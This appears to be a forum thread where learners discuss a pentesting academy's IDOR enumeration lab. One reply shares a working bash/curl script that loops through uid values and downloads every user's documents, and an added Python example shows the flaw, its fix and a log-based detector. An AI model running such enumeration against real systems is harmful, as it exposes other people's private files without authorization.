Hello, I am going through the web attacks module. In the Mass IDOR Enumeration section I have a question. The entire section is talking about uid and enumerating them.
So my question is am I just missing something here? Or is there something wrong with the target being spawned? I did find an API I can enumerate but I don’t see any flag file anywhere and again there are 0 uids anywhere in the web app.
Ahh I see. I mean, obviously I did not do it right but I used the bash script, the intruder, etc and everything else they talked about but nothing. It’s just weird how they do that so much, talk about one thing and then do something COMPLETELY different. Don’t get me wrong, I love it, it’s just weird.
I believe the idea is to make us think outside the box. In real-life pentests you have to do a lot of independent research and outside thinking. I have noticed the pattern in the Academy, they intentionally leave things out to make you look at it from a different angle. I know how that goes, I have spent days on some of these modules. Glad you got it!
So clicking the Documents link would not work for me if I used Firefox instead of Burp’s internal browser.
Once I used the internal browser, clicking http://SERVER:PORT/Documents worked, and I could see the POST request in Burp.
When I modified the script from the module to find extensions other than just .pdf and to curl POST requests (instead of the GET request in the example), I struggled to get the wget to download non-pdf files.
So I replaced the wget -q $url/$link with curl -O $url/$link, which seemed to work.
Was far more difficult than I anticipated. Is there an easier way that I’m missing?
Here is my final script, but give it a go yourself before revealing it!!
#!/bin/bash
# Base URL without a trailing slash, so "$url/..." does not become "//..."
url="http://SERVER:PORT"
# Try uid values 1..20 against documents.php (POST body: uid=N)
for i in {1..20}; do
    # Pull every /documents/<name>.<ext> path out of the response, whatever the extension
    for link in $(curl -s -X POST -d "uid=$i" "$url/documents.php" | grep -oP '\/documents.*?\.\w+'); do
        # $link already starts with "/", so no extra slash; -O saves the file under its own name
        curl -s -O "$url$link"
    done
done
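For anyone wanting to see the other side of this, here is an added example (not from this thread or the Academy module): a small Python model of what a documents.php like the one above gets wrong, the fixed check, and a log check a defender can run. The function names, the document store and the log format are all assumptions.

```python
"""Added example: the server-side bug behind mass IDOR enumeration, the fix,
and a detection check over application logs. All names/formats are assumed."""
import re
from collections import defaultdict

# Constructed sample data: documents keyed by the uid that owns them.
DOCUMENTS = {
    1: ["/documents/Invoice_1.pdf", "/documents/Report_1.txt"],
    2: ["/documents/Invoice_2.pdf"],
    3: ["/documents/Contract_3.docx"],
}

def documents_vulnerable(session_uid: int, requested_uid: int) -> list:
    """IDOR: trusts the client-supplied uid and never compares it with the
    authenticated session, so uid=1..20 walks every user's documents."""
    return DOCUMENTS.get(requested_uid, [])

def documents_fixed(session_uid: int, requested_uid: int) -> list:
    """Fix: the object reference must belong to the caller. Better still,
    drop the uid parameter and key the lookup on the session uid only."""
    if requested_uid != session_uid:
        raise PermissionError("uid does not match the authenticated session")
    return DOCUMENTS.get(session_uid, [])

# Assumed application-log format: one line per request to documents.php.
LOG_RE = re.compile(
    r"client=(?P<client>\S+) session_uid=(?P<session>\d+) "
    r"path=/documents\.php requested_uid=(?P<requested>\d+)"
)

def detect_idor_enumeration(log_lines, threshold: int = 3) -> dict:
    """Flag clients that requested `threshold` or more distinct uids other
    than their own: the signature of the sequential uid loop."""
    foreign = defaultdict(set)
    for line in log_lines:
        m = LOG_RE.search(line)
        if m and m["session"] != m["requested"]:
            foreign[m["client"]].add(int(m["requested"]))
    return {c: sorted(u) for c, u in foreign.items() if len(u) >= threshold}

SAMPLE_LOG = [  # constructed log lines
    "client=10.0.0.5 session_uid=7 path=/documents.php requested_uid=7",
    "client=10.0.0.9 session_uid=4 path=/documents.php requested_uid=1",
    "client=10.0.0.9 session_uid=4 path=/documents.php requested_uid=2",
    "client=10.0.0.9 session_uid=4 path=/documents.php requested_uid=3",
    "client=10.0.0.9 session_uid=4 path=/documents.php requested_uid=4",
]
```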
Although I support your claim, riddling and reinstructing are not the same. Thus, the frustration everyone feels is extremely justifiable for a subscription-based learning platform that promotes the former. It does not benefit students to force them to rethink and develop poor study habits.
Or, the creators simply cannot properly instruct nor reinstruct payees without riddling in a childlike manner. Directly asking tough questions with the intent being to research on specific topics prior to responding would be more conducive if it actually counted towards the cube-collecting interactive modular work and could have beneficial results come of it for those who are skills building for a career in Information Technology, Cybersecurity, Pentesting etc.
I had a hard time finding the flag from the examples on this forum. I did notice the downloaded pdf file was an MD5 hash of 1 and the get document script referenced 1, so I took the long way and incremented 1 to 20 until I found the flag.
To all those who feel stuck in this and other ctfs, my piece of advice is not to make my mistake of wanting to finish the ctf quickly or when very tired. I approached this very ctf after a long day of work (I am a QA engineer), I was very tired and though I read both the text of the module and this thread many, many times, I was not able to understand anything about how to complete this ctf, even if the advice given in this thread is self-explanatory. Then I decided to stop and clear my mind during the morning and early evening of the following day, by forcing myself not to think of this ctf at all. When I went back to the ctf half an hour ago, I immediately understood the mistakes I was making the day before and how to solve it.
The scripts did not work for me. I managed to complete Mass IDOR Enumeration and Bypassing Encoded Characters without scripts, using only Burp Intruder.
IF like me YOU GET HERE after you have been looking around the internet for an answer, you have found some script and it still doesn't work; swap your wget command for curl -O $url/$link . No need for Burp or ZAP etc, just bash and curl . DM me if you get stuck